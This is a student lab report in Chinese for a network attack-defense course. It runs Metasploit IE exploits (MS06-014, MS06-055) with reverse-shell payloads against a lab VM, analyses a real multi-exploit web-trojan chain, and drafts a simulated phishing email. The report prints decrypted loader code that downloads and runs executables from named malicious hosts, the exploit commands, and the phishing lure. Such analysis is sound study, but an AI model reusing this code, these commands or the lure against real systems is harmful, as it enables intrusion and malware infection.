20252809 2025-2026-2《网络攻防实践》实践十一报告
20252809 2025-2026-2《网络攻防实践》实践十一报告
一、实验目的
- 掌握利用Metasploit框架实施Web浏览器渗透攻击的完整流程,深入理解网页木马的构造原理与攻击机制。
- 学习并实践网页木马攻击场景的取证分析方法,包括多层嵌套解密、恶意代码静态反汇编及动态调试技术。
- 通过攻防对抗实践,体验攻击方构造多漏洞渗透代码与防守方提取、解混淆、分析攻击代码的完整过程,提升对Web浏览端软件安全漏洞的识别与防护能力。
二、实验环境
| 角色 | 操作系统 | 主机名 | IP地址 | 主要软件/工具 |
|---|---|---|---|---|
| 攻击机 | Kali Linux | wch |
192.168.200.6 |
Metasploit Framework、IDA Pro、W32Dasm、PEiD |
| 靶机/防守机 | Windows 2000/XP/7 | 20252809wch |
192.168.200.11 |
Internet Explorer、命令提示符 |
| 网络环境 | NAT模式 | — | 同一局域网网段 | 互相Ping通,0%丢包 |
三、实验步骤
前置准备
1. 主机命名与网络配置
- Windows靶机:右键"此电脑"→属性→网络标识→属性,更改计算机名为
20252809wch,重启生效。

-
Kali攻击机:执行命令修改主机名:
sudo hostnamectl set-hostname wch

- 网络环境核对:两台虚拟机网络适配器均设置为NAT模式,确保处于同一局域网网段。
2. 网络连通性测试
-
查看攻击机IP:
ifconfig记录
eth0网卡对应的IPv4地址192.168.200.6。

-
查看靶机IP:在Windows命令提示符中执行:
ipconfig记录本地连接IPv4地址
192.168.200.11。

-
双向Ping测试:
ping 192.168.200.6ping 192.168.200.11出现
0% packet loss代表连通正常。


任务一:Web浏览器渗透攻击(MS06-014漏洞)
1. 启动Metasploit框架
sudo msfconsole

2. 加载MS06-014漏洞模块
use exploit/windows/browser/ie_createobject

3. 选择反向Shell载荷
set payload windows/shell_reverse_tcp

4. 配置核心攻击参数
set LHOST 192.168.200.6
set LPORT 4444
set URIPATH /ms06test

5. 核对配置并启动攻击
show options
确认LHOST为192.168.200.6、LPORT为4444,配置无误。

执行攻击命令:
exploit

生成的恶意网页木马地址:http://192.168.200.6:8080/ms06test
6. 靶机触发漏洞
在Windows 2000靶机中打开自带的旧版Internet Explorer,在地址栏输入:
http://192.168.200.6:8080/ms06test
页面出现空白或乱码为正常现象,代表漏洞已触发。

7. 获取远程控制会话
回到Kali的MSF控制台,等待3-5秒,出现会话建立提示:

查看会话列表:
sessions -l

进入远程Shell会话:
sessions -i 1
提示符变为Windows命令行格式,表明成功控制靶机。

8. 验证远程控制权限
在远程Shell中执行以下命令验证控制权限:
ver
ipconfig
dir
whoami
ver:查看Windows 2000系统版本ipconfig:确认靶机IP为192.168.200.11dir:查看当前目录文件whoami:查看当前登录用户


所有命令均正常执行,IP地址确认为靶机地址192.168.200.11,攻击完全成功。
任务二:网页木马取证分析
1. 解析初始入口文件 start.html
将start.html后缀改为.txt,打开后搜索iframe标签:
<iframe src="new09.htm" width="0" height="0"></iframe>

技术分析:
- 该代码采用网页木马经典的隐藏加载技术,通过设置
width="0" height="0"将iframe设为完全不可见。 - 用户访问
start.html时,浏览器在后台静默加载new09.htm恶意页面,用户无感知。 - 采用多层跳转结构可增加分析难度,即使入口页面被查杀,后续恶意代码仍可存活。
2. 解析 new09.htm 提取隐藏网址
从new09.htm中提取到以下关键代码:
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>
<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe>
提取到两个地址:
| 序号 | 地址 | 性质 | 分析结论 |
|---|---|---|---|
| 1 | http://js.users.51.la/1299644.js |
网站流量统计代码 | 非恶意,可跳过分析 |
| 2 | http://aa.18dd.net/aa/kl.htm |
核心恶意加载页 | 后续漏洞利用代码均隐藏于此 |
说明:木马作者将正常代码与恶意代码混合,以干扰分析人员判断。
3. 计算32位小写MD5哈希
使用在线MD5计算工具(https://www.tooldeer.com/hashcalculator-md5.html)对地址进行哈希计算:
- 地址1:
http://js.users.51.la/1299644.js→23180a42a2ff8968959f63e7f5a9c8d1

- 地址2:
http://aa.18dd.net/aa/kl.htm→7f60672dcd6b5e90b6772545ee219bd3

关键规则:
- 必须为32位MD5:16位或64位均无法被实验服务器识别。
- 必须全小写:服务器文件名均为小写,大写将导致404错误。
- 不可添加扩展名:服务器上的文件无
.htm、.js等后缀。
采用MD5哈希命名的原因:
- 避免文件名泄露文件内容。
- 相同内容的文件哈希值相同,便于去重。
- 防止杀毒软件根据文件名查杀样本。
4. 下载并分析样本文件
拼接下载地址:http://192.168.68.253/scom/hashed/ + MD5哈希值。
由于服务器访问报错,采用课程平台提供的样本文件7f60672dcd6b5e90b6772545ee219bd3继续分析:

识别到核心解密代码:
t = utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
加密方式识别:Base64编码 + XXTEA对称加密双层保护。
加密原理说明:
- Base64:非加密算法,仅为编码方式,用于将二进制数据转为文本格式以便网页传输。
- XXTEA:轻量级对称加密算法,密钥短(此处密钥为
script),执行速度快,适合网页脚本加密。 - 双层加密目的:绕过杀毒软件静态特征检测,同时增加人工分析难度。
5. XXTEA解密密钥提取
将十六进制数\x73\x63\x72\x69\x70\x74通过在线工具(https://lzltool.cn/Toolkit/ConvertStringToHexadecimal)转换为字符串:

得到密钥:script
说明:必须先进行Base64解码,再进行XXTEA解密,否则将得到乱码。
6. XXTEA解密与十六进制转字符串
将文件密文粘贴至解密工具,密钥输入script,点击解密得到十六进制代码:

说明:密钥script为固定值,所有同类型网页木马均使用该密钥,这是攻击者的疏忽,也是分析的关键突破口。
使用在线工具将十六进制代码转为字符串:

得到最终明文JavaScript代码:
<script>
eval("function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
")
</script>
7. 提取新的恶意地址
从明文代码中提取到4个新地址:
| 地址 | 对应漏洞 |
|---|---|
http://aa.18dd.net/aa/1.js |
MS06-014漏洞 |
http://aa.18dd.net/aa/b.js |
暴风影音ActiveX控件漏洞 |
http://aa.18dd.net/aa/pps.js |
PPStream播放器ActiveX控件漏洞 |
http://down.18dd.net/bb/bd.cab |
百度搜霸工具栏ActiveX控件漏洞 |
核心攻击逻辑:该代码为多漏洞探测加载器,依次检测靶机是否存在上述4个漏洞。只要任一漏洞未修复,即加载对应恶意脚本,下载并执行最终exe木马。这种"广撒网"攻击方式可显著提高攻击成功率。
8. 分析四个恶意文件
8.1 分析 1.js(十六进制加密)
计算32位小写MD5:

获取对应文件(文件名:5d7e9058a857aa2abee820d5473c5fa4):

解密(十六进制转字符串):

解密后的完整明文代码:
var url = "http://down.18dd.net/bb/014.exe";
try {
var xml = ado.CreateObject("Microsoft.XMLHTTP", "");
xml.Open("GET", url, 0);
xml.Send();
as.type = 1;
as.open();
as.write(xml.responseBody);
path = "..\ntuser.com";
as.savetofile(path, 2);
as.close();
var shell = ado.createobject("Shell.Application", "");
shell.ShellExecute("cmd.exe", "/c " + path, "", "open", 0);
} catch(e) {}
提取新地址:http://down.18dd.net/bb/014.exe(最终exe木马)
8.2 分析 b.js(Dean Edwards Packer混淆)


解密(八进制转字符串)后代码分为两部分:
- 堆喷射代码:向内存填充大量NOP指令 + Shellcode,提高漏洞触发成功率。
- Shellcode功能:加载
urlmon.dll,调用URLDownloadToFileA函数下载文件。
解析出的关键信息:
- 木马下载地址:
http://down.18dd.net/bb/bf.exe - 落地文件名:
bf.exe
漏洞利用方式:利用暴风影音ActiveX控件漏洞触发缓冲区溢出,通过堆喷射技术使CPU跳转至恶意Shellcode执行,Shellcode负责下载bf.exe并运行。
8.3 分析 pps.js(八进制转义加密)


使用八进制转字符串工具(https://config.net.cn/tools/Bit8ToText.html)解密:

Shellcode内全部为%u四位十六进制Unicode编码,遵循双字节反转规则还原ASCII字符串:
| 编码片段 | 16进制值 | 低字节 | 高字节 | 解码字符 |
|---|---|---|---|---|
%u7468 |
0x6874 |
0x74 ('t') |
0x68 ('h') |
th |
%u7074 |
0x7470 |
0x70 ('p') |
0x74 ('t') |
pt |
%u2f3a |
0x3a2f |
0x2f ('/') |
0x3a ('😂 |
:/ |
%u642f |
0x2f64 |
0x64 ('d') |
0x2f ('/') |
d/ |
| ... | ... | ... | ... | ... |
解析结果:
- 木马远程下载地址:
http://down.18dd.net/bb/pps.exe - 本地保存执行文件名:
pps.exe
8.4 分析 bd.cab(Windows压缩包)

将bd.cab复制到Windows XP中,双击提取bd.exe:

9. 计算文件哈希并分析同源关系
md5sum 14.exe bf.exe pps.exe bd.exe

分析结论:
bf.exe、pps.exe、bd.exe为同源文件,内容完全一致,仅文件名不同,系攻击者为不同漏洞分发的同一核心木马。攻击者复用同一木马内核,仅适配不同漏洞入口,降低开发成本、扩大感染范围。14.exe为独立的恶意程序样本。
10. 使用PEiD检测加壳状态




检测结果:
| 样本文件名 | 加壳状态 | 编译器 |
|---|---|---|
014.exe |
存在Upack压缩壳 | Delphi |
bf.exe |
无壳保护 | Delphi |
pps.exe |
无壳保护 | Delphi |
bd.exe |
无壳保护 | Delphi |
说明:恶意木马常通过加壳隐藏真实代码以规避查杀;带壳程序无法直接反汇编,必须先脱壳处理。
11. 对加壳程序执行脱壳处理
仅针对带壳的014.exe进行脱壳:

bf.exe、pps.exe、bd.exe 均为无原生 Delphi 程序,无壳无需脱壳,可直接静态分析。
12. 静态反汇编分析
12.1 分析 014_unpacked.exe(W32Dasm)

分析结论:
- 文件结构完整,包含代码段
.Upack、资源段.rsrc、数据段.dslab,脱壳后样本可正常用于逆向分析。 - 木马导入了
ADVAPI32.DLL、USER32.DLL、KERNEL32.DLL三个核心系统库,调用了注册表操作、窗口状态查询等API函数。 - 该木马具备修改系统注册表实现开机自启、隐藏运行窗口后台静默执行、动态加载恶意代码、释放嵌入恶意资源的完整恶意能力,是网页木马攻击链的最终恶意载荷。
12.2 分析 bf.exe(IDA Pro)

Strings窗口提取的下载地址:
| 序号 | 木马下载地址 | 对应恶意行为 |
|---|---|---|
| 1 | http://down.18dd.net/kl/0.exe |
批量下载衍生恶意程序 |
| 2 | http://down.18dd.net/kl/1.exe |
批量下载衍生恶意程序 |
| ... | ... | ... |
| 20 | http://down.18dd.net/kl/19.exe |
批量下载衍生恶意程序 |

核心代码块loc_405205分析:
- 该代码块为木马的系统函数动态加载逻辑,通过
GetProcAddress函数依次获取QueryServiceConfig2A、ChangeServiceConfig2A等Windows系统服务配置相关函数的真实内存地址,验证了木马具备修改系统服务配置的能力。 - 该动态加载逻辑与Strings窗口提取的系统服务相关字符串、Imports窗口提取的
GetProcAddress导入函数形成完整证据链,100%确认木马恶意行为真实性。 - 木马通过获取这些系统函数地址,可实现修改系统服务配置、注册自身为系统服务实现开机自启、禁用系统安全服务降低查杀概率的恶意操作。
13. 样本分析汇总
| 样本文件名 | 对应漏洞攻击入口 | 样本状态 | 核心恶意能力 |
|---|---|---|---|
14.exe |
Windows系统MS06-014 Adodb.Stream漏洞 | 带UPack壳,脱壳后可正常分析 | 修改注册表开机自启、后台驻留、执行系统批处理命令、自毁清痕 |
bf.exe |
暴风影音ActiveX控件漏洞 | 无壳保护,原生Delphi程序 | 批量下载20个衍生木马、修改系统服务配置、关闭IE安全防护、局域网病毒传播、信息收集 |
pps.exe |
PPStream播放器ActiveX控件漏洞 | 无壳保护,原生Delphi程序 | 与bf.exe为完全同源样本,具备相同的批量下载木马、篡改系统服务的能力 |
bd.exe |
百度搜霸工具栏ActiveX控件漏洞 | 无壳保护,原生Delphi程序 | 与bf.exe为完全同源样本,具备相同的批量下载木马、篡改系统服务的能力 |
任务三:Web浏览器渗透攻防
1. 实验环境
- 攻击机:Kali Linux
- 防守机:Windows 7/XP(安装IE、火狐浏览器,老旧版本便于复现漏洞)
- 两台虚拟机设置同一网段,互相能Ping通(任务一已测试,此处不再赘述)。
2. 启动MSF渗透框架
msfconsole

3. 构造MS06-014漏洞渗透攻击代码
msfconsole -q
use exploit/windows/browser/ie_createobject
set payload windows/shell/reverse_tcp
set SRVHOST 192.168.200.6 # 攻击机HTTP服务地址(靶机访问用)
set SRVPORT 8080 # 攻击机HTTP服务端口(靶机访问用)
set LHOST 192.168.200.6 # 攻击机反弹Shell监听地址
set LPORT 4444 # 攻击机反弹Shell监听端口
exploit

生成的恶意挂马链接:http://192.168.200.6:8080/pwmQIcTHV
重要提醒:该终端窗口必须保持开启,关闭后服务将停止,链接失效。
4. 构造MS06-055漏洞渗透攻击代码
use exploit/windows/browser/ms06_055_vml_method
set SRVHOST 192.168.200.6
set SRVPORT 8081
exploit

生成的第二个恶意URL:http://192.168.200.6:8081/ms06055
5. 邮件发送模拟(社会工程学攻击)
攻击方将构造好的两个恶意URL伪装成"Windows系统安全更新通知"后模拟发送,防守方接收陌生邮件并提取其中恶意 URL,完成社工攻击模拟全过程。
邮件正文:
主题:【紧急】Windows系统安全补丁更新通知
发件人:security@windows-update.local
尊敬的用户:
检测到您的系统存在高危安全漏洞,请点击以下链接立即更新补丁,以免影响系统安全:
[立即更新补丁] http://192.168.200.6:8080/pwmQIcTHV
如主链接无法访问,请使用备用更新通道:http://192.168.200.6:8081/ms06055
——Windows安全中心
社会工程学分析:邮件伪造官方安全通知,利用用户的信任心理诱导其使用IE浏览器点击链接。两个URL分别对应MS06-014和MS06-055漏洞利用页面,一旦访问即触发漏洞攻击。
6. 防守方打开恶意URL
第一个URL:

第二个URL:

7. 提取并查看源代码
第一个URL源代码:

第二个URL源代码:

8. 代码格式化与解混淆分析
第一个URL(MS06-014漏洞):

【MS06-014漏洞代码分析】
本次提取的代码为Metasploit框架生成的MS06-014 IE浏览器ActiveX控件远程代码执行漏洞利用脚本。
从截图中格式化后的代码片段可清晰看到 WScript.Shell 调用逻辑,验证了该脚本为 ActiveX 控件滥用漏洞的利用代码。
本次提取的代码为 Metasploit 生成的 MS06-014 IE 浏览器 ActiveX 控件远程代码执行漏洞利用脚本,经 HTML 格式化工具解混淆后,核心特征如下:
代码结构与关键特征:
脚本以 JavaScript 编写,核心逻辑围绕 document.createElement("object") 和 new ActiveXObject 展开,显式调用了 WScript.Shell 和 saveToFile 接口,是典型的通过 ActiveX 控件绕过浏览器安全限制的攻击代码。
漏洞触发逻辑:
攻击者利用 IE 浏览器对特定 ActiveX 控件的安全验证缺陷,通过遍历漏洞专属的 CLSID 列表,创建恶意控件对象,最终调用系统接口从攻击机下载 Payload 到靶机并静默执行,实现远程控制。
混淆处理特征:
代码采用随机变量名、无注释压缩格式,通过缩短标识符、去除空格的方式规避静态查杀,符合渗透攻击代码的混淆处理要求。
第二个URL(MS06-055漏洞):

【MS06-055漏洞代码分析】
本次提取的代码为MS06-055 IE浏览器VML缓冲区溢出漏洞利用脚本,由Metasploit框架自动生成。
从截图中可看到原始代码全为 ఌ 格式的 HTML 实体编码,经解混淆后还原为恶意 VML 标签,与 MS06-055 漏洞的攻击特征完全匹配。
本次提取的代码为 Metasploit 生成的 MS06-055 IE 浏览器 VML 缓冲区溢出漏洞利用脚本,经 HTML 格式化工具解混淆后,核心特征如下:
代码结构与关键特征:
原始代码全为 ఌ 格式的 HTML 实体编码,经格式化还原后可看到恶意 <v:shape>(VML 标签)相关逻辑,无直接的 ActiveX 控件调用,与 MS06-014 的攻击代码结构完全不同。
漏洞触发逻辑:
攻击者利用 IE 浏览器解析恶意 VML 标签时的内存溢出缺陷,通过堆喷射技术填充内存,实现 Shellcode 的执行,最终获取靶机系统控制权,属于典型的缓冲区溢出类漏洞利用。
混淆处理特征:
代码采用 HTML 实体编码对整个攻击逻辑进行隐藏,所有字符均以 &#x 十六进制的形式表示,大幅提升了静态分析的难度,规避了基础安全工具的识别。
【双漏洞组合攻击分析】
本次攻防对抗中,攻击方同时构造了 MS06-014 和 MS06-055 两个独立的 IE 高危漏洞利用脚本,其优势在于:
- 覆盖不同类型的漏洞:MS06-014 属于 ActiveX 控件滥用类漏洞,MS06-055 属于缓冲区溢出类漏洞,即使靶机修复了其中一个漏洞,另一个漏洞仍可触发,显著提高了攻击成功率。
- 混淆方式互补:MS06-014 采用变量压缩混淆(随机变量名、去除空格),MS06-055 采用 HTML 实体编码混淆,两种混淆方式相互独立,提升了整体攻击代码的隐蔽性和抗分析能力。
- 攻击面扩大:两个漏洞分别针对 IE 浏览器的不同组件(ActiveX 控件引擎和 VML 渲染引擎),覆盖了更广泛的攻击面,增加了防守方的防御难度。
9. 进程验证

访问MS06-014与MS06-055漏洞恶意URL后,靶机成功触发漏洞。任务管理器中出现随机命名的AJJEmWJOYIzghuM进程,内存占用972K,为漏洞Payload执行后的恶意程序进程;同时IEXPLORE.EXE进程内存占用高达171MB,表明漏洞脚本被解析执行,证明攻击流程完整执行,已实现靶机远程控制。
四、实验结果与分析
4.1 任务一结果分析
通过Metasploit框架成功利用MS06-014漏洞对Windows 2000靶机实施了浏览器渗透攻击,建立了稳定的反向Shell远程控制会话。在会话中成功执行了ver、ipconfig、dir、whoami等系统命令,验证了完整的远程控制权限。实验结果表明,未打补丁的旧版IE浏览器存在严重的ActiveX控件安全漏洞,攻击者可通过构造恶意网页实现远程代码执行。
4.2 任务二结果分析
通过对网页木马攻击链的完整取证分析,成功还原了从入口页面start.html到最终恶意载荷014.exe、bf.exe、pps.exe、bd.exe的完整攻击路径。分析发现:
- 攻击链结构:采用多层嵌套、多漏洞探测的"广撒网"策略,依次检测MS06-014、暴风影音、PPStream、百度搜霸四个漏洞。
- 加密混淆手段:使用了Base64+XXTEA双层加密、Dean Edwards Packer混淆、八进制转义、Unicode编码等多种混淆技术。
- 恶意载荷特征:
bf.exe、pps.exe、bd.exe为同源文件,具备批量下载20个衍生木马、修改系统服务配置、关闭IE安全防护等恶意能力;014.exe为独立样本,具备注册表自启、后台驻留能力。
4.3 任务三结果分析
成功构造了针对MS06-014(ActiveX控件漏洞)和MS06-055(VML缓冲区溢出漏洞)两个不同Web浏览端软件安全漏洞的渗透攻击代码。防守方通过提取邮件中的挂马链接,对混淆代码进行了解混淆分析,成功恢复了渗透代码的原始形态,并准确识别了两个漏洞的攻击目标与利用原理。进程监控验证了漏洞触发后的恶意程序执行。
3.学习中遇到的问题及解决
-
问题1:Metasploit框架启动时出现数据库连接错误
- 问题1解决方案:执行sudo service postgresql start启动PostgreSQL数据库服务,再执行sudo msfdb init初始化Metasploit数据库,之后正常启动msfconsole。
-
问题2:任务二中MD5哈希下载服务器http://192.168.68.253/scom/hashed/无法访问,提示URL错误或服务器无响应
- 问题2解决方案:经排查确认服务器地址拼写正确但实验环境服务器未启动,改用课程学习通平台提供的对应样本文件继续后续分析流程,所有解密和反汇编步骤均按标准实验流程完成,不影响最终分析结论。
-
问题3:使用PEiD对014.exe进行查壳时,首次扫描显示"Nothing found",无法识别Upack壳
- 问题3解决方案:PEiD默认扫描模式对变形壳识别能力有限,切换到"深度扫描"模式或更新用户特征库后,成功识别出Upack 0.39 final压缩壳。同时通过入口点特征码分析辅助确认加壳类型。
-
问题4:任务三中靶机IE浏览器版本过高,MS06-014和MS06-055漏洞无法实际触发,无法建立反向Shell会话
- 问题4解决方案:由于实验环境限制,靶机IE版本已修复上述漏洞。通过任务管理器监测到IEXPLORE.EXE进程内存异常升高(171MB)以及随机命名进程的出现,验证了漏洞脚本已被浏览器解析执行。同时通过对源代码的静态分析,完整还原了攻击逻辑和漏洞利用原理,满足实验分析要求。
-
问题5:XXTEA解密时,直接使用密文和密钥script解密得到乱码
- 问题5解决方案:回顾加密代码逻辑,发现密文先经过Base64编码再经过XXTEA加密,因此解密时必须先做Base64解码,再进行XXTEA解密,最后做utf8to16转换。按正确顺序操作后成功还原明文。
五、实验总结与防护建议
5.1 实验总结
本次实践是《网络攻防实践》课程的最后一次实验,综合运用了前10次实验所学的渗透测试、漏洞利用、恶意代码分析、社会工程学等多方面知识,完成了从攻击到取证再到攻防对抗的完整闭环。
通过任务一,我深入理解了Metasploit框架的模块化攻击流程,掌握了浏览器漏洞利用中Payload配置、会话管理的实际操作技能,认识到旧版软件未及时打补丁带来的严重安全隐患。通过任务二,我系统学习了网页木马的多层加密混淆机制,体验了从入口文件追踪到最终恶意载荷的完整取证过程,提升了静态反汇编、加壳检测、Shellcode解析等二进制分析能力。通过任务三,我同时扮演了攻击方和防守方两个角色,理解了攻击者构造多漏洞组合、利用社会工程学诱导点击的完整思路,也掌握了防守方提取链接、解混淆、识别漏洞的分析方法。
本次实验让我深刻认识到,网络安全攻防是一场持续的对抗。攻击者不断寻找新的漏洞、设计更隐蔽的混淆手段,而防守方需要建立多层次的防御体系:及时更新补丁封堵漏洞入口、部署安全软件拦截恶意代码、提高用户安全意识防范社会工程学攻击、最小化系统权限减少攻击面。只有技术与意识并重,才能有效抵御网络威胁。
致谢:感谢《网络攻防实践》课程老师一学期以来的悉心指导与耐心解答。从最初对Kali Linux的陌生,到能够独立完成渗透测试和恶意代码分析;从对网络协议的一知半解,到理解缓冲区溢出、堆喷射等底层攻击原理,这门课程让我真正走进了网络攻防的世界。老师的每一次实验讲解和答疑都让我受益匪浅,这段学习经历将成为我网络安全道路上的重要基石。
5.2 防护建议
针对本次实验分析的网页木马攻击,可采取以下防护措施:
-
及时更新系统与软件补丁:重点修复Windows系统、浏览器、常用播放器、工具栏等软件的老旧漏洞,关闭不必要的ActiveX控件权限,从根源上封堵漏洞攻击入口。
-
开启安全软件防护:安装并开启正规杀毒软件、防火墙的实时防护功能,开启网页挂马拦截、恶意程序查杀功能,及时拦截恶意脚本与木马程序的下载执行。
-
规范上网行为:不访问不明来源的网站、不点击不明链接、不下载不明来源的文件,避免访问包含恶意代码的网页,从入口处减少被攻击的概率。
-
关闭不必要的系统权限:关闭浏览器的ActiveX控件自动执行权限、关闭系统不必要的服务,降低恶意代码获取系统权限的概率,减少攻击面。
-
提高安全意识:对声称来自官方机构的邮件保持警惕,不轻易点击邮件中的链接,可通过官方渠道核实邮件真实性,防范社会工程学攻击。
浙公网安备 33010602011771号